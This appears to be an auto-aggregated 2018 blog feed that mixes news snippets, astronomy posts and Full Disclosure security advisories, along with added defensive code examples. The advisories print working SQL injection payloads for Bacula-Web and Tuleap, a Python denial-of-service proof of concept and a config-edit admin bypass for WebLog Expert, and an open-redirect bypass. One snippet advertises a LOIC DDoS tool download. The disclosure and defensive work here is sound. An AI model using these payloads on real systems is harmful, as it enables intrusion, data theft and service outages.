Saturday, March 10, 2018

Anonymous Creativity

Anonymous Creativity. Have you ever thought about it? We want to be famous as a writer, as a poet, as a painter, as a politician, as a singer, or what you will. Why? Because we really don't love what we are doing. If you loved to sing, or to paint, or to write poems, if you really loved it you would not be ...

from Google Alert - anonymous http://ift.tt/2FHkWsE
via IFTTT

telegram anonymous chat

Chat with strangers at random in private chat rooms. This was first published on the Online Journalism Blog. Get for Telegram. Hi, I'm AnonyMeet, I'm designed to associate anonymous chats through a special algorithm. You are invited to the group Hhhhhhh. Pin sidebar. 8chan /zoo/ - Zoophilia ...

from Google Alert - anonymous http://ift.tt/2DgF53a
via IFTTT

Anonymous pastebin

bloomberg. g. The first pastebin was the eponymous pastebin. Xyz - Anonymous PasteBin Alternative Menu. On Monday After reports that Pastebin was handing over IP addresses to authorities, Anonymous teamed up with the People Liberation Front to create a Pastebin alternative. NSA collects Big ...

from Google Alert - anonymous http://ift.tt/2p4BAbn
via IFTTT

Anonymous ddos attack download

Anonymous LOIC tool for DDOS attack. DDOs attack with Anonymous Attacker Package - tutorial (xrhstos full download Anonymous LOIC tool for DDOS attackTorrent name:Anonymous LOIC tool for DDOS attackSeeds:8Leechers:0Health: Total size:130 KBTorrent added:2012-07-02 11 Play, streaming, ...

from Google Alert - anonymous http://ift.tt/2IhCMku
via IFTTT

Friday, March 9, 2018

Disable creator/editor fields for a survey shared to a group or organization for anonymous survey

I'm creating a safety survey for my organization to capture near miss incidents. I would like the survey to be submitted anonymously. Is there a way to disable the capture of creator/editor fields? I have disabled tracking in the feature service settings, but the creator/editor fields are still displayed in the data ...

from Google Alert - anonymous http://ift.tt/2DfvB8u
via IFTTT

APT Hackers Infect Routers to Covertly Implant Slingshot Spying Malware

Security researchers at Kaspersky have identified a sophisticated APT hacking group that has been operating since at least 2012 without being noticed due to their complex and clever hacking techniques. The hacking group used a piece of advanced malware—dubbed Slingshot—to infect hundreds of thousands of victims in the Middle East and Africa by hacking into their routers. According to a


from The Hacker News http://ift.tt/2Fu8KIc
via IFTTT

GlobaLeaks The Software Enabling Secure and Anonymous

GlobaLeaks The Software Enabling Secure and Anonymous.

from Google Alert - anonymous http://ift.tt/2DewXQW
via IFTTT

Single mother by anonymous sperm donor no dad needed

Many single women use known or anonymous donors through sperm banks by a single mother. Dudum's father I want my kids to have always known they have a donor, not a dad. What follows is a guide to using donor sperm for recipients, with the requirements to use donor sperm cells, the types of ...

from Google Alert - anonymous http://ift.tt/2IcgAYV
via IFTTT

Anonymous Recruiter

View details and apply for this general manager job in South East London (SE10) with Anonymous Recruiter on Caterer.com. We are looking for a passionate and motivated general manager who is looking for a new challenge to take our business to the next level.

from Google Alert - anonymous http://ift.tt/2FqIHG4
via IFTTT

ISPs Caught Injecting Cryptocurrency Miners and Spyware In Some Countries

Governments in Turkey and Syria have been caught hijacking local internet users' connections to secretly inject surveillance malware, while the same mass interception technology has been found secretly injecting browser-based cryptocurrency mining scripts into users' web traffic in Egypt. Governments, or agencies linked to it, and ISPs in the three countries are using Deep Packet Inspection


from The Hacker News http://ift.tt/2DdWud1
via IFTTT

Orioles: Manny Machado on list of players we'd love to see in Aaron Judge-less HR Derby field - Buster Olney (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

[FD] DSA-2018-020: Dell EMC Data Protection Advisor Hardcoded Password Vulnerability

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple SQL injection vulnerabilities in Bacula-Web (CVE-2017-15367)

Title: Multiple SQL injection vulnerabilities in Bacula-Web (CVE-2017-15367)
Credit: Gustavo Sorondo / http://ift.tt/2tvmReT
Vendor/Product: Bacula-Web (http://bacula-web.org/)
Vulnerability: SQL injection
Vulnerable version: All prior to 8.0.0-RC2.
Fixed in: 8.0.0-RC2
CVE: CVE-2017-15367

## Vulnerability Details

Bacula-web before 8.0.0-rc2 is affected by multiple SQL Injection vulnerabilities that could allow an attacker to access the Bacula database and, depending on configuration, escalate privileges on the server.

1) The /jobs.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of the "select @@version" query.

Request:
GET /jobs.php?status=0&level_id=&client_id=0&start_time=&end_time=&orderby=jobid&jobs_per_page=25&pool_id=11%27%20UNION%20ALL%20SELECT%20@@version%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 HTTP/1.1

Response:
HTTP/1.1 200 OK
[...]
5.7.19-0ubuntu0.16.04.1
backupjob-report.php?backupjob_name=
[...]

Other parameters (e.g. client_id) are also vulnerable, since there is no protection against SQL Injections at all.

2) The /backupjob-report.php script is affected by a SQL Injection vulnerability. The following GET request can be used to extract the result of the "select @@version" query.

Request:
GET /client-report.php?period=7&client_id=21%20UNION%20ALL%20SELECT%20NULL,@@version%23

3) The /client-report.php is affected by a SQL Injection vulnerability in the "client_id" parameter.

## Vulnerability Disclosure Timeline

2017-08-01 - Vulnerabilities discovered by Cinta Infinita
2017-08-09 - Vulnerabilities reported to Bacula-Web
2017-08-09 - Vulnerabilities confirmed by Bacula-Web
2017-10-15 - CVE-2017-15367 is assigned
2017-10-16 - Bacula-Web fixes backupjob-report.php and client-report.php in dev branch
2018-03-02 - Bacula-Web fixes jobs.php in dev branch
2018-03-02 - Version 8.0.0-RC2 is published
2018-03-07 - Full disclosure

## Related fixes and releases

http://ift.tt/2oXQT6l
http://ift.tt/2Hk6fbV
http://ift.tt/2oZ5Yo4

## About Cinta Infinita

Cinta Infinita offers Information Security related services. Our Headquarters are in Buenos Aires, Argentina. For more information, visit http://ift.tt/2tu3iUd

Source: Gmail -> IFTTT-> Blogger

[FD] Hola VPN 1.79.859 - Insecure service permissions

=====[ Tempest Security Intelligence - ADV-22/2018 ]=== Hola VPN 1.79.859 - Insecure service permissions

Source: Gmail -> IFTTT-> Blogger

[FD] WPS Free Office 10.2.0.5978 - NULL DACL grants full access

=====[ Tempest Security Intelligence - ADV-16/2018 ]=== WPS Free Office 10.2.0.5978 - NULL DACL grants full access

Source: Gmail -> IFTTT-> Blogger

[FD] Panda Global Security 17.0.1 - NULL DACL grants full access

=====[ Tempest Security Intelligence - ADV-17/2018 ]=== Panda Global Security 17.0.1 - NULL DACL grants full access

Source: Gmail -> IFTTT-> Blogger

School district takes down anonymous tip line

After two anonymous calls to the school district over student safety concerns proved a dead end for law enforcement, Superintendent Monte Woolstenhulme said this week that the tip line has.

from Google Alert - anonymous http://ift.tt/2tz8kii
via IFTTT

[FD] Panda Global Security 17.0.1 - Unquoted service path

=====[ Tempest Security Intelligence - ADV-18/2018 ]=== Panda Global Security 17.0.1 - Unquoted service path

Source: Gmail -> IFTTT-> Blogger

[FD] BitDefender Total Security 2018 - Insecure Pipe Permissions

=====[ Tempest Security Intelligence - ADV-19/2018 ]=== BitDefender Total Security 2018 - Insecure Pipe Permissions

Source: Gmail -> IFTTT-> Blogger

[FD] 10-Strike Network Monitor 5.4 - Unquoted Service Path

=====[ Tempest Security Intelligence - ADV-20/2018 ]=== 10-Strike Network Monitor 5.4 - Unquoted Service Path

Source: Gmail -> IFTTT-> Blogger

[FD] WebLog Expert Web Server Enterprise v9.4 / Remote Denial Of Service CVE-2018-7582

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://ift.tt/2oXF9ka
[+] ISR: Apparition Security

Vendor:
=======
www.weblogexpert.com

Product:
=========
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.

Vulnerability Type:
===================
Denial Of Service

CVE Reference:
==============
CVE-2018-7582

Security Issue:
================
WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service (daemon crash) via a long HTTP Accept Header to TCP port 9991.

(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000
eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
778d016d 83c404 add esp,4

Exploit/POC:
=============
import socket
print 'Weblog Expert Server / Denial Of Service'
print 'hyp3rlinx'
IP='Weblog Expert Server IP'
PORT=9991
PAYLOAD="GET /index.html HTTP/1.0 Host: +'IP'+':9991 User-Agent: Mozilla Accept: */*" + "A"*2000+'\r\n\r\n'
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP,PORT))
s.send(PAYLOAD)
s.close()

Network Access:
===============
Remote

Severity:
=========
Medium

Disclosure Timeline:
=============================
Vendor Notification: February 3, 2018
Second attempt : February 17, 2018
March 7, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

[FD] Tuleap SQL Injection

===============================================================================
title: Tuleap SQL Injection
case id: CM-2018-01
product: Tuleap version 9.17.99.189
vulnerability type: Blind SQL injection - time based
severity: High
found: 2018-02-24
by: Cristiano Maruti (@cmaruti)
===============================================================================

[EXECUTIVE SUMMARY]

Enalean Tuleap is a project management system for application lifecycle management, agile development and design projects, requirement management, IT services management, and so on. The analysis discovered a time-based blind SQL injection vulnerability (OTG-INPVAL-005) in the tracker functionality of the Tuleap software engineering platform. A malicious user can inject arbitrary SQL commands into the application. The vulnerability lies in the project tracker service search functionality; depending on project visibility, successful exploitation may or may not require user authentication. A successful attack can read, modify or delete data from the database or, depending on the privilege of the user (default: restricted) and the database engine in use (default: MySQL), execute arbitrary commands on the underlying system.

[VULNERABLE VERSIONS]

The following version of the Tuleap software was affected by the vulnerability; previous versions may be vulnerable as well:
- Tuleap version 9.17.99.189

[TECHNICAL DETAILS]

It is possible to reproduce the vulnerability following these steps:
1. Open the tracker service in a publicly visible project
2. Leave all the fields empty and submit the search form while logging the request with the help of an application proxy like Burp or ZAP
3. Copy the previous request and edit the "criteria[499][values][]" field in the request body with the "(select(0)from(select(sleep(3)))a)/**/" payload
4. Send the request to the application
5. Application will respond with a three second delay

Below is a full transcript of the HTTP request used to raise the vulnerability, and also a cURL one-liner to highlight the induced delay in the application response.

HTTP Request

Source: Gmail -> IFTTT-> Blogger
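Both the Bacula-Web advisory (CVE-2017-15367) above and the Tuleap advisory just posted share one root cause: a request parameter is pasted into SQL text, so the parameter can change the query's structure (a UNION in one case, a sleep() subquery in the other). The following is an added example and not code from either project; the table layout, the function names and the in-memory SQLite catalog are constructed stand-ins for illustration. It puts the vulnerable pattern beside the parameterised version so the difference in behaviour on a crafted client_id is visible.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a backup catalog: two clients, one job each.
    Not Bacula's real schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Client (ClientId INTEGER PRIMARY KEY, Name TEXT);
        CREATE TABLE Job (JobId INTEGER PRIMARY KEY, ClientId INTEGER, Name TEXT);
        INSERT INTO Client VALUES (21, 'backup-host-01'), (22, 'backup-host-02');
        INSERT INTO Job VALUES (1, 21, 'nightly-21'), (2, 22, 'nightly-22');
        """
    )
    return conn


def jobs_for_client_vulnerable(conn: sqlite3.Connection, client_id: str) -> List[Tuple[int, str]]:
    """The defect class in both advisories: the request parameter is interpolated into
    the SQL text, so quote characters inside it become part of the query."""
    sql = "SELECT JobId, Name FROM Job WHERE ClientId = '%s'" % client_id
    return conn.execute(sql).fetchall()


def jobs_for_client_safe(conn: sqlite3.Connection, client_id) -> List[Tuple[int, str]]:
    """Hardened form: enforce the expected type first, then bind the value through a
    placeholder so the driver passes it as data and never as SQL."""
    try:
        cid = int(client_id)
    except (TypeError, ValueError):
        raise ValueError("client_id must be an integer")
    return conn.execute(
        "SELECT JobId, Name FROM Job WHERE ClientId = ?", (cid,)
    ).fetchall()


def safe_rejects(conn: sqlite3.Connection, client_id) -> bool:
    """True when the hardened lookup refuses the supplied value outright."""
    try:
        jobs_for_client_safe(conn, client_id)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    tainted = "21' OR '1'='1"  # constructed tautology, stands in for the advisories' payloads
    print("vulnerable:", jobs_for_client_vulnerable(db, tainted))  # leaks every client's jobs
    print("safe rejects tainted value:", safe_rejects(db, tainted))
    print("safe, clean value:", jobs_for_client_safe(db, "21"))
```

The type check matters as much as the placeholder: an identifier such as client_id or pool_id is an integer by contract, so rejecting anything that is not one removes the whole input class, including the time-based probe from the Tuleap post, before any SQL is built. Where a parameter is legitimately text, the placeholder alone is still sufficient; the driver never lets bound data terminate the literal.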

[FD] WebLog Expert Web Server Enterprise v9.4 / Authentication Bypass CVE-2018-7581

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://ift.tt/2txAxWM
[+] ISR: Apparition Security

Vendor:
========
www.weblogexpert.com

Product:
========
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you information about your site's visitors: activity statistics, accessed files, paths through the site, information about referring pages, search engines, browsers, operating systems, and more. The program produces easy-to-read reports that include both text information (tables) and charts.

Vulnerability Type:
===================
Authentication Bypass

CVE Reference:
==============
CVE-2018-7581

Security Issue:
================
The "WebServer.cfg" under "ProgramData\WebLog Expert\WebServer\" used by WebLog Expert Web Server Enterprise 9.4 has weak permissions (BUILTIN\Users:(ID)C), which allows local users to set a cleartext password and login as admin.

A standard, non-Administrator Windows user can edit the 'WebServer.cfg' file under "C:\ProgramData\WebLog Expert\WebServer" to set a cleartext password and login as admin.

e.g.
C:\ProgramData\WebLog Expert\WebServer>cacls * | more
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C
                                                     BUILTIN\Administrators:(ID)C
                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                     BUILTIN\Administrators:(ID)F

Exploit/POC:
=============
Login as a 'Standard' Windows user.
Comment out the Admin hashed password using ';' then add any cleartext password as follows.

[User:admin]
Password=1234
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
bAllProfiles=1

Now login in as Admin! :)

Network Access:
===============
Local

Severity:
=========
Medium

Disclosure Timeline:
=============================
Vendor Notification: March 1, 2018
No replies from previous attempts
March 7, 2018 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger
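The weakness in the post above is visible in a single cacls line: a configuration file that governs authentication grants Change (C) to BUILTIN\Users. The same check can be run across a whole ProgramData tree before anyone needs to hunt for it by hand. The following is an added example, not the advisory author's or the vendor's code; it parses output in the cacls format quoted in the post and flags entries that let a low-privileged principal modify a file. The sample listing reproduces the advisory's four lines and adds a constructed, hardened counterpart (C:\ProgramData\Example\hardened.cfg is made up) for contrast; the principal set and the regular expression are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import List

# One cacls access-control entry: <principal>:<flags><perm>. The flags are zero or
# more parenthesised tokens such as (ID) for an inherited entry; the permission is a
# single cacls letter: N (none), R (read), W (write), C (change), F (full control).
ACE_RE = re.compile(
    r"(?P<principal>NT AUTHORITY\\\S+|NT SERVICE\\\S+|\S+):"
    r"(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[NRWCF])\s*$"
)

# Principals that every local, non-administrative user belongs to (assumed list).
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# cacls letters that allow the holder to modify the file's contents.
WRITE_PERMS = {"W", "C", "F"}


@dataclass
class Ace:
    path: str
    principal: str
    perm: str
    inherited: bool


def parse_cacls(output: str) -> List[Ace]:
    """Parse cacls output. The first ACE of a file shares its line with the path;
    the remaining ACEs follow on indented continuation lines."""
    aces: List[Ace] = []
    current_path = None
    for line in output.splitlines():
        m = ACE_RE.search(line)
        if not m:
            continue  # blank lines or other cacls chatter
        head = line[: m.start()].strip()
        if head:  # text before the ACE is a path: a new file starts here
            current_path = head
        if current_path is None:
            continue
        aces.append(Ace(current_path, m.group("principal"), m.group("perm"),
                        "(ID)" in m.group("flags")))
    return aces


def weak_entries(aces: List[Ace]) -> List[Ace]:
    """ACEs that let a low-privileged principal write to the file."""
    return [a for a in aces
            if a.principal in LOW_PRIV_PRINCIPALS and a.perm in WRITE_PERMS]


# Constructed sample: the first file is the listing quoted in the advisory, the
# second is a made-up hardened file whose ACL only lets Users read.
SAMPLE_CACLS = r"""
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C
                                                     BUILTIN\Administrators:(ID)C
                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                     BUILTIN\Administrators:(ID)F
C:\ProgramData\Example\hardened.cfg BUILTIN\Users:(ID)R
                                    BUILTIN\Administrators:(ID)F
                                    NT AUTHORITY\SYSTEM:(ID)F
"""

if __name__ == "__main__":
    for ace in weak_entries(parse_cacls(SAMPLE_CACLS)):
        tag = "inherited" if ace.inherited else "explicit"
        print(f"WEAK: {ace.path} grants {ace.perm} to {ace.principal} ({tag})")
```

On a live system the input is the output of `cacls <dir>\*` run on the directory in question; icacls prints a different token format ((I)(M), (F) and so on), so its output would need its own pattern. The inherited flag is worth reporting because, as in this case, an inherited Change entry usually means the parent directory's ACL is what has to be corrected rather than the one file.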

NFL Free Agency: Best and worst case scenarios for Ravens and rest of the league - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

waa (we architech anonymous

Company: waa (we architech anonymous. waa (we architech anonymous) logo · Beijing, China · Architect/senior architectural assistant at waa (we architech anonymous). An opportunity for an architect/senior architectural assistant is available at Bejing-based firm waa. More. 9 March 2018 Tags: ...

from Google Alert - anonymous http://ift.tt/2oX2YIP
via IFTTT

ISS Daily Summary Report – 3/08/2018

Plant Gravity Perception (PGP): Today the crew replaced four of the European Modular Cultivation System (EMCS) Experiment Containers (ECs) for the next Plant Gravity Perception experiment run. Two of the ECs powered up and remained powered.  For this investigation, normal and mutated forms of thale cress, a model research plant, are germinated to support the … Continue reading "ISS Daily Summary Report – 3/08/2018"

from ISS On-Orbit Status Report http://ift.tt/2HkY2Vd
via IFTTT

Over 15,000 Memcached DDoS Attacks Hit 7100 Sites in Last 10 Days

Memcached reflections that recently fueled the two largest amplification DDoS attacks in history have also helped other cybercriminals launch nearly 15,000 cyber attacks against 7,131 unique targets in the last ten days, a new report revealed. Chinese Qihoo 360's Netlab, whose global DDoS monitoring service 'DDosMon' initially spotted the Memcached-based DDoS attacks, has published a blog


from The Hacker News http://ift.tt/2FuVqn4
via IFTTT

Windows 10 'S Mode' Coming Soon — For Security and Performance

Microsoft has confirmed that the company is planning to convert Windows 10 S from a dedicated operating system to a special "S Mode" that will be available in all versions of Windows. Windows 10 S, a new operating system designed for simplicity, security, and speed, was released by Microsoft last year. It locks a computer down to run only applications downloaded from the official Windows Store,


from The Hacker News http://ift.tt/2G8vm2b
via IFTTT

Horsehead: A Wider View


Combined image data from the massive, ground-based VISTA telescope and the Hubble Space Telescope was used to create this wide perspective of the interstellar landscape surrounding the famous Horsehead Nebula. Captured at near-infrared wavelengths, the region's dusty molecular cloud sprawls across the scene that covers an angle about two-thirds the size of the Full Moon on the sky. Left to right the frame spans just over 10 light-years at the Horsehead's estimated distance of 1,600 light-years. Also known as Barnard 33, the still recognizable Horsehead Nebula stands at the upper right, the near-infrared glow of a dusty pillar topped with newborn stars. Below and left, the bright reflection nebula NGC 2023 is itself the illuminated environs of a hot young star. Obscuring clouds below the base of the Horsehead and on the outskirts of NGC 2023 show the tell-tale far red emission of energetic jets, known as Herbig-Haro objects, also associated with newborn stars. via NASA http://ift.tt/2HkOLMJ

Thursday, March 8, 2018

anonymous galaxy



from Google Alert - anonymous http://ift.tt/2DbHnki
via IFTTT

Head Chef

View details and apply for this head chef hotel job in Boughton Lees, Ashford (TN25) with Anonymous Recruiter on Caterer.com. Head Chef- Deluxe Hotel 2AA rosette Restaurant – Kent circ£55k Head Chef- Basic salary of up £50k plus performance bonus and company package Our client is seeking a ...

from Google Alert - anonymous http://ift.tt/2G7YdDQ
via IFTTT

Plasterer in Chelmsford (CM1) | Anonymous

View details and apply for this plasterer job in Chelmsford (CM1) with Anonymous on totaljobs. An experienced plasterer is required to work within domestic properties, taking down ceilings and walls etc.

from Google Alert - anonymous http://ift.tt/2Fq0vgd
via IFTTT

How to set up a sweepstakes in an anonymous survey

We are often asked how to create an anonymous survey and let participants enter an optional drawing for prizes.

from Google Alert - anonymous http://ift.tt/2FnLpvO
via IFTTT

ISS Daily Summary Report – 3/07/2018

Airway Monitoring:  In support of the European Space Agency (ESA) Airway Monitoring investigation, today the crew completed calibration of the hardware in the US Laboratory and then completed two different measurement protocols; the low Nitric Oxide (NO) protocol which determines how much NO is exhaled with respiration, and the high NO protocol, which determines how … Continue reading "ISS Daily Summary Report – 3/07/2018"

from ISS On-Orbit Status Report http://ift.tt/2FzIkrU
via IFTTT

Alternatives to Alcoholics Anonymous Work as Well as 12-Step Programs

A new study comparing Alcoholics Anonymous (AA) to alternative mutual help groups find these groups perform about as well as 12-step programs, Vox reports. The study compared AA, the original 12-step program, with the three biggest alternative mutual help groups: Women for Sobriety, SMART ...

from Google Alert - anonymous http://ift.tt/2FBquVr
via IFTTT

New Cryptocurrency Mining Malware Infected Over 500,000 PCs in Just Few Hours

Two days ago, Microsoft encountered a rapidly spreading cryptocurrency-mining malware that infected almost 500,000 computers within just 12 hours and successfully blocked it to a large extent. Dubbed Dofoil, aka Smoke Loader, the malware was found dropping a cryptocurrency miner program as payload on infected Windows computers that mines Electroneum coins, yet another cryptocurrency, for


from The Hacker News http://ift.tt/2FE0rwI
via IFTTT

Hard-Coded Password in Cisco Software Lets Attackers Take Over Linux Servers

A medium yet critical vulnerability has been discovered in Cisco Prime Collaboration Provisioning software that could allow a local attacker to elevate privileges to root and take full control of a system. Cisco Prime Collaboration Provisioning (PCP) application allows administrators to remotely control the installation and management of Cisco communication devices (integrated IP telephony,


from The Hacker News http://ift.tt/2oZaLVT
via IFTTT

Why Jake Arrieta, Lance Lynn and Alex Cobb would be a good fit with Orioles - David Schoenfield (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities ...

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities, lawyers say. Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities, lawyers say. Published on 2018-03-08By Paulina Dedaj ...

from Google Alert - anonymous http://ift.tt/2FszkkW
via IFTTT

Anonymous woman to donate roughly $250000 of $559 million Powerball winnings to charities ...

Anonymous woman to donate roughly $250,000 of $559 million Powerball winnings to charities, lawyers say. Anonymous woman to donate roughly $250,000 of $559 million Powerball winnings to charities, lawyers say. Published on 2018-03-07By Paulina Dedaj ...

from Google Alert - anonymous http://ift.tt/2Fiyrzo
via IFTTT

Anonymous

Intercollegiate YMCA · Flat Rock River YMCA Camp · YMCA Association Office · Youth Development YMCA. Anonymous. Home » Anonymous. Recent Posts. The New Pike Y | YMCA Ways to Give | OrthIndy Foundation | YMCA of Greater. Indiana Y's Announce Statewide Membership Reciprocity Plan.

from Google Alert - anonymous http://ift.tt/2FmvkXe
via IFTTT

[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap

Advisory: Arbitrary Redirect in Tuleap

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the redirect mechanism of the application lifecycle management platform Tuleap.

Details
=======
Product: Tuleap
Affected Versions: > 9.17.99.93
Fixed Versions: >= 9.17.99.93
Vulnerability Type: Arbitrary Redirect
Security Risk: low
Vendor URL: https://www.tuleap.org/
Vendor Status: fixed version released
Vendor Issue URL: http://ift.tt/2G8SHko
Advisory URL: http://ift.tt/2D8nYAM
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://ift.tt/1jQGmEN

Introduction
============
"Tuleap is an open source tool for Scrum, Kanban, waterfall, requirement management. Plan, track, code and collaborate on software projects, you get everything at hand." (from the Tuleap website [1])

More Details
============
RedTeam Pentesting discovered an arbitrary redirect vulnerability in the way Tuleap handles redirects. Usually this function is only used in Tuleap after a successful login to assigned trackers; however, the redirect can be used independent of whether a user is authenticated to the application. While the application employs a URL filter to prevent arbitrary redirects, the URL filter can be bypassed. This allows attackers to redirect users to a different website, if a user opens an attacker prepared URL.

The filter can be bypassed by using protocol relative URLs, which omit the leading protocol identifier. These arbitrary URLs are prefixed with two slashes, which instructs the browser to use the same protocol as the current page. This behaviour is specified in RFC 3986 [2] in section 5.4.

Proof of Concept
================
The following URL to an example installation of Tuleap will redirect users to an attacker controlled website:
http://ift.tt/2FsLnP6

Workaround
==========
Currently no workaround is known.

Fix
===
Upgrade to at least Tuleap version 9.17.99.93.

Security Risk
=============
Attackers may convince users to use a prepared link to access a valid Tuleap instance, which then redirects users to a fake login page. This can greatly increase the effectiveness of phishing attacks and may allow attackers to steal user credentials more effectively. However, no credentials or sensitive information can be extracted directly. Furthermore, the website to which users are going to be redirected will be displayed in the browser location bar so that users may identify the attack. Therefore, we rate this vulnerability with a low risk. Nevertheless, it is very easy for attackers to identify this vulnerability and create malicious URLs, which makes it very likely that attackers might abuse this.

Timeline
========
2018-01-02 Vulnerability identified
2018-01-11 Customer approved disclosure to vendor
2018-02-13 Vendor notified
2018-02-14 Vendor released fixed version
2018-03-05 Vendor made issue public
2018-03-08 Advisory released

References
==========
[1] http://ift.tt/2G8SJsw
[2] http://ift.tt/NUWxBd

RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: http://ift.tt/1ixScMF

Working at RedTeam Pentesting
=============================
RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: http://ift.tt/2uIYRk1

Source: Gmail -> IFTTT-> Blogger
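The bypass the advisory above describes, a protocol-relative target ("//host/...") passing a filter that only looks for an explicit scheme, is straightforward to close in a redirect validator. The following is an added example, not RedTeam Pentesting's or Tuleap's code; the function names and the sample targets (attacker.example, the tracker paths) are constructed for illustration. It puts a filter of the weak kind beside a hardened one that accepts only a local path, and also rejects the backslash variant ("/\host") that several browsers normalise to "//host", which the advisory does not mention but which the same fix should cover.

```python
from urllib.parse import urlsplit


def is_safe_redirect_naive(target: str) -> bool:
    """A filter of the kind the advisory describes: it rejects only targets that
    carry an explicit scheme. A protocol-relative target has none, so it passes.
    Constructed illustration of the weak pattern, not Tuleap's actual code."""
    return not target.lower().startswith(("http://", "https://"))


def is_safe_redirect(target: str) -> bool:
    """Hardened check: accept only a path on this site.
    Rejects empty targets, control characters (header injection), anything with a
    scheme or an authority (covers 'https://host' and '//host'), and the backslash
    variants that browsers treat like forward slashes."""
    if not target or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        return False
    candidate = target.replace("\\", "/")  # '/\host' and '\\host' become '//host'
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:
        return False
    return candidate.startswith("/") and not candidate.startswith("//")


def safe_redirect_target(requested: str, default: str = "/") -> str:
    """What a login handler should send in the Location header: the requested
    target when it is local, otherwise a fixed in-site default."""
    return requested if is_safe_redirect(requested) else default


if __name__ == "__main__":
    # Constructed samples; attacker.example is a placeholder host.
    for t in ["/plugins/tracker/?tracker=1", "//attacker.example/login",
              "/\\attacker.example/login", "https://attacker.example/",
              "javascript:alert(1)"]:
        print(f"{t!r:34} naive={is_safe_redirect_naive(t)!s:5} "
              f"hardened={is_safe_redirect(t)}")
```

Allow-listing a path, rather than deny-listing prefixes, is what makes the check robust: every encoding trick an attacker might use has to end up as a local path after the browser's own normalisation, and the validator only ever says yes to that shape.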

Cyclones at Jupiter's North Pole


Juno's Jovian Infrared Auroral Mapper data was used to construct this stunning view of cyclones at Jupiter's North Pole. Measuring the thermal emission from Jovian cloud tops, the infrared observations are not restricted to the hemisphere illuminated by sunlight. They reveal eight cyclonic features that surround a cyclone about 4,000 kilometers in diameter, just offset from the giant planet's geographic North Pole. Similar data show a cyclone at the Jovian South Pole with five circumpolar cyclones. The South Pole cyclones are slightly larger than their northern cousins. Cassini data has shown that gas giant Saturn's north and south poles each have a single cyclonic storm system. via NASA http://ift.tt/2Fq3HIN

Wednesday, March 7, 2018

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities ...

Anonymous woman to donate up to $50 million of $559 million Powerball winnings to charities, lawyers say.

from Google Alert - anonymous http://ift.tt/2oThTE5
via IFTTT

8th St.'s surf is Good

March 07, 2018 at 07:00PM, the surf is Good!

8th St. Summary


